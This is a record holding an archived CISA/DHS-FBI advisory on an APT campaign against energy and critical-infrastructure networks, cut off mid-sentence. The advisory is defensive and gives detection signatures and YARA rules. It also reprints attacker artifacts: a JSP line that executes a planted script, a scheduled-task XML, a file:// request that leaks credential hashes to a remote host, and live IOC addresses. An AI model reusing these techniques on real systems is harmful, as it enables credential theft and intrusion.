{
	"id": "662bc939-e9c7-408c-aebf-c1547b4ff2f8",
	"created_at": "2026-04-06T01:31:35.452279Z",
	"updated_at": "2026-04-10T03:36:24.73966Z",
	"deleted_at": null,
	"sha1_hash": "f3426320cabc355f756fd039f450b88f535b5e6f",
	"title": "Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 160052,
	"plain_text": "Advanced Persistent Threat Activity Targeting Energy and Other\r\nCritical Infrastructure Sectors | CISA\r\nPublished: 2018-03-15 · Archived: 2026-04-06 01:26:16 UTC\r\nSystems Affected\r\nDomain Controllers\r\nFile Servers\r\nEmail Servers\r\nOverview\r\nThis alert has been superseded by newer information. The old alert is provided below for historical reference only.\r\nFor the newest version, please see TA18-074A.\r\nThis joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the\r\nFederal Bureau of Investigation (FBI). This alert provides information on advanced persistent threat (APT) actions targeting\r\ngovernment entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. Working\r\nwith U.S. and international partners, DHS and FBI identified victims in these sectors. This report contains indicators of\r\ncompromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on\r\ncompromised victims’ networks.\r\nDHS assesses this activity as a multi-stage intrusion campaign by threat actors targeting low security and small networks to\r\ngain access and move laterally to networks of major, high value asset owners within the energy sector. Based on malware\r\nanalysis and observed IOCs, DHS has confidence that this campaign is still ongoing, and threat actors are actively pursuing\r\ntheir ultimate objectives over a long-term campaign. 
The intent of this product is to educate network defenders and enable\r\nthem to identify and reduce exposure to malicious activity.\r\nFor a downloadable copy of IOC packages and associated files, see:\r\nTA17-293A_TLP_WHITE.csv\r\nTA17-293A_TLP_WHITE_stix.xml\r\nMIFR-10127623_TLP_WHITE.pdf\r\nMIFR-10127623_TLP_WHITE_stix.xml\r\nMIFR-10128327_TLP_WHITE.pdf\r\nMIFR-10128327_TLP_WHITE_stix.xml\r\nMIFR-10128336_TLP_WHITE.pdf\r\nMIFR-10128336_TLP_WHITE_stix.xml\r\nMIFR-10128830_TLP_WHITE.pdf\r\nMIFR-10128830_TLP_WHITE_stix.xml\r\nMIFR-10128883_TLP_WHITE.pdf\r\nMIFR-10128883_TLP_WHITE_stix.xml\r\nMIFR-10135300_TLP_WHITE.pdf\r\nMIFR-10135300_TLP_WHITE_stix.xml\r\nContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical\r\nassistance.\r\nSince at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical\r\nmanufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims’ networks. Historically,\r\ncyber threat actors have targeted the energy sector with various results, ranging from cyber espionage to the ability to disrupt\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 1 of 15\n\nenergy systems in the event of a hostile conflict. [1] Historically, threat actors have also targeted other critical infrastructure\r\nsectors with similar campaigns.\r\nAnalysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity. Of\r\nspecific note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on\r\nSeptember 6, 2017, provides additional information about this ongoing campaign. [2]\r\nThis campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral\r\norganizations such as trusted third party suppliers with less secure networks. 
The initial victims are referred to as “staging\r\ntargets” throughout this alert. The threat actor uses the staging targets’ networks as pivot points and malware repositories\r\nwhen targeting their final intended victims. The ultimate objective of the cyber threat actors is to compromise organizational\r\nnetworks, which are referred to throughout this alert as “intended target.”\r\nTechnical Details\r\nThe threat actors in this campaign employed a variety of TTPs, including:\r\nopen-source reconnaissance,\r\nspear-phishing emails (from compromised legitimate accounts),\r\nwatering-hole domains,\r\nhost-based exploitation,\r\nindustrial control system (ICS) infrastructure targeting, and\r\nongoing credential gathering.\r\nUsing Cyber Kill Chain for Analysis\r\nDHS leveraged the Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model\r\ninclude reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the\r\nobjective. This section will provide a high-level overview of activity within this framework.\r\nStage 1: Reconnaissance\r\nThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of\r\nopportunity. Staging targets held preexisting relationships with many of the intended targets. It is known that threat actors\r\nare actively accessing publicly available information hosted by organization-monitored networks. DHS further assesses that\r\nthreat actors are seeking to identify information pertaining to network and organizational design, as well as control system\r\ncapabilities, within organizations.\r\nForensic analysis identified that threat actors are conducting open-source reconnaissance of their targets, gathering\r\ninformation posted on company-controlled websites. This is a common tactic for collecting the information needed for\r\ntargeted spear-phishing attempts. 
In some cases, information posted to company websites, especially information that may\r\nappear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a\r\nsmall photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo\r\nthat displayed control systems equipment models and status information in the background.\r\nAnalysis also revealed that the threat actors used compromised staging target networks to conduct open-source\r\nreconnaissance to identify potential targets of interest and intended targets. “Targets of interest” refers to organizations that\r\nDHS observed the threat actors showing an active interest in, but where no compromise was reported. Specifically, the threat\r\nactors accessed publicly accessible web-based remote access infrastructure such as websites, remote email access portals, and virtual\r\nprivate network (VPN) connections.\r\nStage 2: Weaponization\r\nSpear-Phishing Email TTPs\r\nThroughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office\r\nfunctions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. (An example of this\r\nrequest is: file[:]//\u003cremote IP address\u003e/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this\r\nrequest authenticates the client with the server, sending the user’s credential hash to the remote server prior to retrieving the\r\nrequested file. (Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors\r\nthen likely used password-cracking techniques to obtain the plaintext password. 
Once actors obtain valid credentials, they\r\nare able to masquerade as authorized users.\r\nStage 3: Delivery\r\nWhen seeking to compromise the target network, threat actors used a spear-phishing email campaign that differed from\r\npreviously reported TTPs. The spear-phishing email used a generic contract agreement theme, with the subject line\r\n“AGREEMENT \u0026 Confidential”, and contained a generic PDF document, titled “’’document.pdf”. (Note the\r\ninclusion of two single apostrophes at the beginning of the attachment name.) The PDF itself was not malicious and did not\r\ncontain any active code. The document prompted the user to click on a link should a download not automatically begin.\r\n(Note: No code within the PDF initiated a download.) The link directs users to a website via a shortened URL, which may\r\nprompt them to retrieve a malicious file.\r\nIn previous reporting, DHS and FBI identified the common themes used in these spear-phishing emails: all of them referred\r\nto control systems or process control systems. The threat actors continue to use these themes, specifically against intended\r\ntarget organizations. Email messages include references to common industrial control equipment and protocols. The emails\r\nleveraged malicious Microsoft Word attachments that appear to be legitimate résumés or curricula vitae (CVs) for industrial\r\ncontrol systems personnel, as well as invitations and policy documents that entice the user to open the attachment. The list of\r\nfile names has been published in the IOC.\r\nStage 4: Exploitation\r\nThreat actors used distinct and unusual TTPs (i.e., successive redirects) in the phishing campaign directed at staging targets.\r\nEmails contained a stacked URL-shortening link that directed the user to the http://bit[.]ly/2m0x8IH link, which redirected the\r\nuser to the http://tinyurl[.]com/h3sdqck link, which redirected the user to the ultimate destination of\r\nhttp://imageliners[.]com/nitel. 
The imageliner[.]com website contained email address and password input fields\r\nmimicking a login page for a website.\r\nWhen exploiting the intended targets, threat actors used malicious .docx files to capture user credentials; however, DHS did\r\nnot observe the actors establishing persistence on the user’s system. The documents attempt to retrieve a file through a\r\n“file:\\\\” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139 and User Datagram Protocol\r\n(UDP) ports 137 or 138. This connection is made to a command and control (C2) server — either a server owned by the\r\nthreat actors or that of a compromised system owned by a staging location victim. When a user is authenticated as a domain\r\nuser, this will provide the C2 server with the hash of the victim. Local users will receive a graphical user interface (GUI)\r\nprompt to enter a username and password. This information will be provided to the C2 over TCP ports 445 or 139 and UDP\r\nports 137 or 138. (Note: A file transfer is not necessary for a loss of credential information.) Symantec’s report associates\r\nthis behavior with the Dragonfly threat actors in this campaign. [3]\r\nUse of Watering Hole Domains\r\nOne of the threat actors’ primary uses for staging targets is to develop watering holes. The threat actors compromise the\r\ninfrastructure of trusted organizations to reach intended targets. [4] Although these watering holes may host legitimate\r\ncontent by reputable organizations, the threat actors have altered them to contain and reference malicious content.\r\nApproximately half of the known watering holes are trade publications and informational websites related to process\r\ncontrol, ICS, or critical infrastructure.\r\nUsing a similar SMB collection technique, the actors manipulated these websites by altering JavaScript and PHP files that\r\nredirect to an IP address on port 445 for credential harvesting. 
The compromised sites include both custom-developed web\r\napplications and template-based frameworks. The threat actors injected a line of code into header.php, a legitimate PHP file\r\nthat carried out the redirected traffic.\r\nThere is no indication that threat actors used zero-day exploits to manipulate the sites; the threat actors more likely used\r\nlegitimate credentials to access the website content directly.\r\nStage 5: Installation\r\nThe threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication is not\r\nused. [5] Once inside an intended target’s network, the threat actors downloaded tools from a remote server. The initial\r\nversions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.\r\nIn one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following\r\nactions:\r\nThe threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.\r\nThe files were renamed to new extensions, with INST.txt being renamed INST.exe.\r\nThe files were executed on the host and then immediately deleted.\r\nThe execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running\r\nprocess list of a compromised system of an intended target.\r\nIn their report on Dragonfly, Symantec associated the MD5 hash of INST.exe with Backdoor.Goodor. The MD5 hashes for the\r\npreviously mentioned files can be found in the IOC list above.\r\nSeveral of these files were scripts that were used for creating the initial account leveraged by the threat actors. The initial\r\nscript symantec_help.jsp contained a one-line reference to a malicious script. 
It was located at C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\webapps\\ROOT\\.\r\nContents of symantec_help.jsp\r\n______________________________________________________________________________________________________________\r\n\u003c% Runtime.getRuntime().exec(\"cmd /C \\\"\" + System.getProperty(\"user.dir\") + \"\\\\..\\\\webapps\\\\ROOT\\\\\u003cREDACTED SCRIPT NAME\u003e\\\"\"); %\u003e\r\n______________________________________________________________________________________________________________\r\nThe malicious script created a user account, disabled the host-based firewall, and globally opened port 3389 for Remote\r\nDesktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group for\r\nelevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German,\r\nFrench, and English.\r\nIn addition, the threat actors created a scheduled task “reset”, which was designed to automatically log out of their\r\nnewly created account every eight hours.\r\nContents of Scheduled Task\r\n______________________________________________________________________________________________________________\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n  \u003cDate\u003e2017-06-25T11:51:17.4848488\u003c/Date\u003e\r\n  \u003cAuthor\u003e\u003cREDACTED\u003e\u003c/Author\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n  \u003cTimeTrigger\u003e\r\n   \u003cStartBoundary\u003e2017-06-25T12:30:29\u003c/StartBoundary\u003e\r\n   \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n  \u003c/TimeTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n  \u003cPrincipal id=\"Author\"\u003e\r\n   
\u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n   \u003cUserId\u003e\u003cREDACTED USERNAME\u003e\u003c/UserId\u003e\r\n   \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n  \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n  \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n  \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\r\n  \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n  \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n  \u003cStartWhenAvailable\u003efalse\u003c/StartWhenAvailable\u003e\r\n  \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n  \u003cIdleSettings\u003e\r\n   \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n   \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n  \u003c/IdleSettings\u003e\r\n  \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n  \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n  \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n  \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n  \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n  \u003cExecutionTimeLimit\u003eP3D\u003c/ExecutionTimeLimit\u003e\r\n  \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n  \u003cExec\u003e\r\n   \u003cCommand\u003elogoff\u003c/Command\u003e\r\n  \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n______________________________________________________________________________________________________________\r\nAfter achieving access to staging targets, the threat actors installed tools to carry out their mission. 
On one occasion, threat\r\nactors installed the free version of Forticlient, which was presumably used as a VPN client for intended targets.\r\nConsistent with the perceived goal of credential harvesting, the threat actor was observed dropping and executing open-source\r\nand free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations\r\nsuggest that these files were downloaded directly from publicly available locations such as GitHub. Forensic analysis\r\nindicates that many of these tools were executed during the timeframe in which the threat actor was accessing the system. Of\r\nnote, the threat actor installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at\r\nC:\\Users\\\u003cRedacted Username\u003e\\Desktop\\OWAExchange\\. In that folder structure, a subfolder named “out” held\r\nmultiple text files.\r\nPersistence Through .LNK File Manipulation\r\nThe threat actors manipulated .lnk files to repeatedly gather user credentials. Default Windows functionality enables icons to\r\nbe loaded from a local Windows repository. The threat actors exploited this built-in Windows functionality by setting the\r\nicon path to their remotely controlled server. When the user browses to the directory, Windows attempts to load the icon and\r\ninitiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted\r\nSMB connection. The threat actors used this tactic in both Virtual Desktop Infrastructure (VDI) and traditional\r\nenvironments.\r\nThree of the observed .lnk files were SETROUTE.lnk, notepad.exe.lnk, and Document.lnk. These names appear to be\r\ncontextual, and threat actors may use a variety of other file names within this tactic. 
Two of the remote servers observed in\r\nthese .lnk files were 62.8.193[.]206 and 5.153.58[.]45.\r\nEstablishing Local Accounts\r\nThe threat actors created accounts on the staging target for ongoing operations. These accounts, masquerading as legitimate\r\nservice accounts, appeared to be tailored to each individual staging target. Each account created by the threat actors served a\r\nspecific purpose in their operation. DHS and FBI identified the creation of four local accounts on a compromised server. The\r\nserver operated as both a domain controller and an email server for a staging target.\r\nAccount 1: The threat actors created a local account, which was named to mimic backup services of the staging target. This\r\naccount was created by the aforementioned malicious script. The threat actors used this account to conduct open-source\r\nreconnaissance and remotely access intended targets. This account was also used to remove the Forticlient software.\r\nAccount 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed\r\naction was to create Account 3.\r\nAccount 3: The threat actors created Account 3 in the staging victim’s Microsoft Exchange Server. A PowerShell script\r\ncreated this account during an RDP session while the threat actor was authenticated as Account 2. The naming convention\r\nof the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last\r\nname).\r\nAccount 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator\r\naccount. Account 4 was then used to delete the following logs: system, security, terminal services, remote services, and\r\naudit. 
Registry analysis indicated that this activity was likely scripted.\r\nStage 6: Command and Control\r\nThe threat actors commonly use web shells to compromise publicly available servers to gain a foothold into internal\r\nnetworks. This activity has been observed on both web and email servers. The threat actors then establish an encrypted\r\nconnection over port 443 to the web shell. Once connected, the threat actors download additional malicious files from the\r\nthreat actors’ servers to the publicly available server. Two of the web shells (AutoDiscover.aspx and global.aspx) used by\r\nthe actors are detailed in the accompanying IOC list. Despite having different file names, the two web shells had the same MD5 hash,\r\nindicating that the two files were identical. These web shells have been associated with the ciklon_z webshell.\r\nDHS and FBI identified the threat actors leveraging remote access services and infrastructure, such as VPN, RDP, and\r\nOutlook Web Access (OWA). The threat actors used staging targets to connect to several intended targets, effectively turning\r\nthe staging targets into command and control points. To date, it is presumed that the threat actors have targeted services that\r\nuse single-factor authentication. DHS believes that the threat actors employ this methodology to avoid detection and\r\nattribution.\r\nTargeting of ICS and SCADA Infrastructure\r\nUpon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network.\r\nSpecifically, the threat actors focused on identifying and browsing file servers within the intended victim’s network. The\r\nthreat actors viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems. 
Based on DHS\r\nanalysis of existing compromises, the file names contained ICS vendor names and referred to ICS reference\r\ndocuments pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).\r\nIn one instance, the threat actors accessed workstations and servers on a corporate network that contained data output from\r\ncontrol systems within energy generation facilities. In this same incident, the threat actors created a malicious scheduled task\r\nthat invoked “scr.exe” with the argument “scr.jpg”. The MD5 hash of scr.exe matched the MD5 of ScreenUtil, a tool used\r\nby the threat actor, as reported in the Symantec Dragonfly 2.0 report.\r\nDetection and Response\r\nIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI\r\nrecommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA\r\nrules provided and add the IPs to their watchlist to determine whether malicious activity has been observed within their\r\norganization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these\r\nAPT actors.\r\nNetwork Signatures and Host-Based Rules\r\nThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with\r\nthe threat actors’ TTPs. 
Although these network signatures and host-based rules were created using a comprehensive vetting\r\nprocess, the possibility of false positives always remains.\r\nNetwork Signatures\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)\"; sid:42000000; rev:1; flow:established,to_server; content:\"/aspnet_client/system_web/4_0_30319/update/\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\r\n___________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/img/bson021.dat'\"; sid:42000001; rev:1; flow:established,to_server; content:\"/img/bson021.dat\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/A56WY' (Callback)\"; sid:42000002; rev:1; flow:established,to_server; content:\"/A56WY\"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp any any -\u003e any 445 (msg:\"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)\"; sid:42000003; rev:1; flow:established,to_server; content:\"|FF|SMB|75 00 00 00 00|\"; offset:4; depth:9; content:\"|08 00 01 00|\"; distance:3; content:\"|00 5c 5c|\"; distance:2; within:3; content:\"|5c|AME_ICON.PNG\"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)\"; sid:42000004; rev:1; flow:established,to_server; content:\"/ame_icon.png\"; http_uri; fast_pattern:only; content:\"OPTIONS\"; nocase; http_method; 
classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'\"; sid:42000005; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip\"; http_header; fast_pattern:only; pcre:\"/\\.(?:aspx|txt)\\?[a-z0-9]{3}=[a-z0-9]{32}\u0026/U\"; classtype:bad-unknown; metadata:service http;)\r\n__________________________________________\r\nalert tcp $EXTERNAL_NET [139,445] -\u003e $HOME_NET any (msg:\"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session\"; sid:42000006; rev:1; flow:established,to_client; content:\"|ff 53 4d 42 72 00 00 00 00 80|\"; fast_pattern:only; content:\"|05 00|\"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)\r\nYARA Rules\r\n/*\r\nThis is a consolidated rule set for malware associated with, consisting of rules written by US-CERT, as well as contributions\r\nby trusted partners.\r\n*/\r\nrule APT_malware_1\r\n{\r\nmeta:\r\n description = \"inveigh pen testing tools \u0026 related artifacts\"\r\n author = \"US-CERT Code Analysis Team\"\r\n date = \"2017/07/17\"\r\n hash0 = \"61C909D2F625223DB2FB858BBDF42A76\"\r\n hash1 = \"A07AA521E7CAFB360294E56969EDA5D6\"\r\n hash2 = \"BA756DD64C1147515BA2298B6A760260\"\r\n hash3 = \"8943E71A8C73B5E343AA9D2E19002373\"\r\n hash4 = \"04738CA02F59A5CD394998A99FCD9613\"\r\n hash5 = \"038A97B4E2F37F34B255F0643E49FC9D\"\r\n hash6 = \"65A1A73253F04354886F375B59550B46\"\r\n hash7 = \"AA905A3508D9309A93AD5C0EC26EBC9B\"\r\n hash8 = \"5DBEF7BDDAF50624E840CCBCE2816594\"\r\n hash9 = \"722154A36F32BA10E98020A8AD758A7A\"\r\n hash10 = \"4595DBE00A538DF127E0079294C87DA0\"\r\nstrings:\r\n $s0 = \"file://\"\r\n $s1 = \"/ame_icon.png\"\r\n $s2 = \"184.154.150.66\"\r\n $s3 = { 
87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }\r\n $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }\r\n $s5 = \"(g.charCodeAt(c)^l[(l[b]+l[e])%256])\"\r\n $s6 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n $s7 = \"VXNESWJfSjY3grKEkEkRuZeSvkE=\"\r\n $s8 = \"NlZzSZk=\"\r\n $s9 = \"WlJTb1q5kaxqZaRnser3sw==\"\r\n $s10 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n $s11 = \"fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])\"\r\n $s12 = \"ps.exe -accepteula \\\\%ws% -u %user% -p %pass% -s cmd /c netstat\"\r\n $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }\r\n $s14 = {\r\n68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967\r\n}\r\n $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }\r\n//inveigh pentesting tools\r\n $s16 = {\r\n24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65\r\n}\r\n//specific malicious word document PK archive\r\n $s17 = {\r\n2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }\r\n $s18 = {\r\n6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B4821\r\n}\r\n $s19 = {\r\n8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }\r\n $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }\r\n $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }\r\n $s22 = \"5.153.58.45\"\r\n $s23 = \"62.8.193.206\"\r\n $s24 = \"/1/ree_stat/p\"\r\n $s25 = \"/icon.png\"\r\n $s26 = \"/pshare1/icon\"\r\n $s27 = \"/notepad.png\"\r\n $s28 = \"/pic.png\"\r\n $s29 = 
\"http://bit.ly/2m0x8IH\"\r\ncondition:\r\n ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12\r\nand $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or\r\n$s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28)\r\nor ($s29)\r\n}\r\nrule APT_malware_2\r\n{\r\nmeta:\r\n description = \"rule detects malware\"\r\n author = \"other\"\r\nstrings:\r\n $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }\r\n $http_push = \"X-mode: push\" nocase\r\n $http_pop = \"X-mode: pop\" nocase\r\ncondition:\r\n any of them\r\n}\r\nrule Query_XML_Code_MAL_DOC_PT_2\r\n{\r\nmeta:\r\n name= \"Query_XML_Code_MAL_DOC_PT_2\"\r\n author = \"other\"\r\nstrings:\r\n $zip_magic = { 50 4b 03 04 }\r\n $dir1 = \"word/_rels/settings.xml.rels\"\r\n $bytes = {8c 90 cd 4e eb 30 10 85 d7}\r\ncondition:\r\n $zip_magic at 0 and $dir1 and $bytes\r\n}\r\nrule Query_Javascript_Decode_Function\r\n{\r\nmeta:\r\n name= \"Query_Javascript_Decode_Function\"\r\n author = \"other\"\r\nstrings:\r\n $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22\r\n22 29 3B}\r\n $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64\r\n65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E\r\n69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}\r\n $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28\r\n?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29\r\n2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 
29}\r\n $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}\r\n $func_call=\"a(\\\"\"\r\ncondition:\r\n filesize \u003c 20KB and #func_call \u003e 20 and all of ($decode*)\r\n}\r\nrule Query_XML_Code_MAL_DOC\r\n{\r\nmeta:\r\n name= \"Query_XML_Code_MAL_DOC\"\r\n author = \"other\"\r\nstrings:\r\n $zip_magic = { 50 4b 03 04 }\r\n $dir = \"word/_rels/\" ascii\r\n $dir2 = \"word/theme/theme1.xml\" ascii\r\n $style = \"word/styles.xml\" ascii\r\ncondition:\r\n $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd\r\n}\r\nImpact\r\nThis APT actor’s campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and\r\ncritical manufacturing sectors.\r\nSolution\r\nDHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help\r\ndefend against this activity.\r\nNetwork and Host-based Signatures\r\nDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and\r\nSnort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their\r\norganization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious\r\nactivity. 
Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated\r\nYARA and .txt file to identify malicious activity.\r\nDetections and Prevention Measures\r\nUsers and administrators can detect spear phishing, watering hole, web shell, and remote access activity by\r\ncomparing all IP addresses and domain names listed in the IOC packages to the following locations:\r\nnetwork intrusion detection system/network intrusion protection system logs,\r\nweb content logs,\r\nproxy server logs,\r\ndomain name server resolution logs,\r\npacket capture (PCAP) repositories,\r\nfirewall logs,\r\nworkstation Internet browsing history logs,\r\nhost-based intrusion detection system/host-based intrusion prevention system (HIPS) logs,\r\ndata loss prevention logs,\r\nexchange server logs,\r\nuser mailboxes,\r\nmail filter logs,\r\nmail content logs,\r\nAV mail logs,\r\nOWA logs,\r\nBlackberry Enterprise Server logs, and\r\nMobile Device Management logs.\r\nTo detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes\r\nlisted in the IOC packages with the following locations:\r\napplication logs,\r\nIIS/Apache logs,\r\nfile system,\r\nintrusion detection system/intrusion prevention system logs,\r\nPCAP repositories,\r\nfirewall logs, and\r\nreverse proxy.\r\nDetect spear-phishing by searching workstation file systems, as well as network-based user directories, 